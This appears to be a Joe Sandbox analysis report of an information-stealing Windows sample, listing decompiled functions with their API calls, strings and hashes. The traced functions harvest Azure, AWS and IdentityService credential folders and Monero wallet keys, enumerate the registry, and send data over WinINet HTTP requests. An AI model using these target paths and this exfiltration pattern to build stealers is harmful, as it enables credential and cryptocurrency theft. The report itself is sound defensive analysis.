Instruction ID: 39db426fda332060d71d4e681bb9e43ba13c3c92b45c2882db4bff186f5cdaee
Opcode Fuzzy Hash: d352b64662a42f796af05a10654309ad6575ebc3c70bd2e5edfc967261566458
Instruction Fuzzy Hash: 09E1F971910108ABCF05FBA4DD96EEE777CAF65301F904168F506A70A1EF756A08CBA2

Function 001848D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00184965
StrCmpCA.SHLWAPI(?,013AE450), ref: 0018498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184B0A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001A0DC3,00000000,?,?,00000000,?,",00000000,?,013AE4E0), ref: 00184E38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00184E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00184E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00184E99
InternetCloseHandle.WININET(00000000), ref: 00184EFD
InternetCloseHandle.WININET(00000000), ref: 00184F15
HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 00184B65

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

InternetCloseHandle.WININET(00000000), ref: 00184F1F

Strings

------, xrefs: 00184B78
", xrefs: 00184D83
", xrefs: 00184C42
------, xrefs: 00184A0D
------, xrefs: 00184CB9

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: f96a5b23808d613e23bcc8e8e9eba70bcc5b11f98fb8eb1a32c7ece449648f30
Instruction ID: 6d03277b007b98cef89238463de9256d949f376dcb56a3a28064c0b2e3cccdbe
Opcode Fuzzy Hash: f96a5b23808d613e23bcc8e8e9eba70bcc5b11f98fb8eb1a32c7ece449648f30
Instruction Fuzzy Hash: 45129C71910118AACF15EB94DC52FEEB779BF65300F9041A9B506624A1EF706F4CCFA2

Function 00197DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

RegOpenKeyExA.KERNEL32(00000000,013AA9E0,00000000,00020019,00000000,001A05A6), ref: 00197E44
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
wsprintfA.USER32 ref: 00197EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
RegCloseKey.ADVAPI32(00000000), ref: 00197F39

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Strings

- , xrefs: 00198043
%s\%s, xrefs: 00197EED
?, xrefs: 00197E1A

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 01597248142f5891f5da161a5b2a5416d23255223533ae695921bd071f32b6ba
Instruction ID: b3af9fcfd9bab08d03846a661d9f784516d3c2a29611f3ef2318bfa1a0d26e41
Opcode Fuzzy Hash: 01597248142f5891f5da161a5b2a5416d23255223533ae695921bd071f32b6ba
Instruction Fuzzy Hash: 8C81F971910118ABDF29DB54CD95FEAB7B8BF18700F408298E10AA6190DF716B89CFE1

Function 001862D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0018644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001864BD
InternetCloseHandle.WININET(00000000), ref: 0018653F
InternetCloseHandle.WININET(00000000), ref: 00186549
InternetCloseHandle.WININET(00000000), ref: 00186553

Strings

ERROR, xrefs: 00186519
GET, xrefs: 001863CC
ERROR, xrefs: 00186457

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 1aaadd2c8561814b94faf29d8e19ce831982d049f427c544704a945a0bce46c0
Instruction ID: a3c256456a0845368e95c36b424f923ea768c6583bb014f130e6baaeca5375ae
Opcode Fuzzy Hash: 1aaadd2c8561814b94faf29d8e19ce831982d049f427c544704a945a0bce46c0
Instruction Fuzzy Hash: 8E713C71A00218ABDF14EBA0CC59BEEB778BF55700F508199F50A6B194DBB46A88CF91

Function 00194FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195124
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195181
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195337

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00194CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00194D08

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00194DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00194DF8
Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E0F
Part of subcall function 00194DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00194E44
Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E63
Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E8E

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0019526B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195420
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001954EC
Sleep.KERNEL32(0000EA60), ref: 001954FB

Strings

ERROR, xrefs: 00195116
ERROR, xrefs: 001954DE
ERROR, xrefs: 00195329
ERROR, xrefs: 00195173
ERROR, xrefs: 00195412
ERROR, xrefs: 0019525D

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 84f528f337ce04accaeffaa34f0055a851f97e6e461006572e78515585c38411
Instruction ID: 671d92f90a7855c07c78b59bc7830f2f5169c493427489b77cdb93148054dc58
Opcode Fuzzy Hash: 84f528f337ce04accaeffaa34f0055a851f97e6e461006572e78515585c38411
Instruction Fuzzy Hash: EEE11F72910104AACF15FBA4EC96EED773DAF65300F808528B507661A1EF746B4DCBE2

Function 00194850 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 00194890
lstrcat.KERNEL32(?,\.azure\), ref: 001948AD

Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423

lstrcat.KERNEL32(?,00000000), ref: 0019491C
lstrcat.KERNEL32(?,\.aws\), ref: 00194939

Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672

lstrcat.KERNEL32(?,00000000), ref: 001949A8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 001949C5

Part of subcall function 001943F0: wsprintfA.USER32 ref: 00194490
Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A08BA), ref: 001944A5
Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944C2
Part of subcall function 001943F0: PathMatchSpecA.SHLWAPI(?,?), ref: 001944FE
Part of subcall function 001943F0: lstrcat.KERNEL32(?,013AE500), ref: 0019452A
Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FC8), ref: 0019453C
Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194550
Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FCC), ref: 00194562
Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194576
Part of subcall function 001943F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0019458C
Part of subcall function 001943F0: DeleteFileA.KERNEL32(?), ref: 00194611

Strings

Azure\.aws, xrefs: 0019493F
msal.cache, xrefs: 001949D0
*.*, xrefs: 00194944
\.azure\, xrefs: 001948A1
\.aws\, xrefs: 0019492D
*.*, xrefs: 001948B8
\.IdentityService\, xrefs: 001949B9
Azure\.azure, xrefs: 001948B3
Azure\.IdentityService, xrefs: 001949CB

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 8cd8a3285fc0078e933a9d7fb8be2bb03d673576115c3b60f159f0c379c0f0af
Instruction ID: 8f87280017fd09cda39b14dd2c6de0a470b2c90051cbddaec587e73c3b88e15a
Opcode Fuzzy Hash: 8cd8a3285fc0078e933a9d7fb8be2bb03d673576115c3b60f159f0c379c0f0af
Instruction Fuzzy Hash: 7D4162BA9402046BDB24F770EC47FDD773C9B66704F404594B689A60C1EFB45B898BA2

Function 00181310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
Part of subcall function 001812A0: RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
Part of subcall function 001812A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 001812D7
Part of subcall function 001812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
Part of subcall function 001812A0: RegCloseKey.ADVAPI32(?), ref: 001812FF

lstrcat.KERNEL32(?,00000000), ref: 0018134F
lstrlen.KERNEL32(?), ref: 0018135C
lstrcat.KERNEL32(?,.keys), ref: 00181377

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00181465

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

DeleteFileA.KERNEL32(00000000), ref: 001814EF

Strings

.keys, xrefs: 0018136B
SOFTWARE\monero-project\monero-core, xrefs: 00181335
wallet_path, xrefs: 00181330
\Monero\wallet.keys, xrefs: 0018138D

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateChangeCopyCreateDeleteFindFreeNotificationOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2023266049-218353709
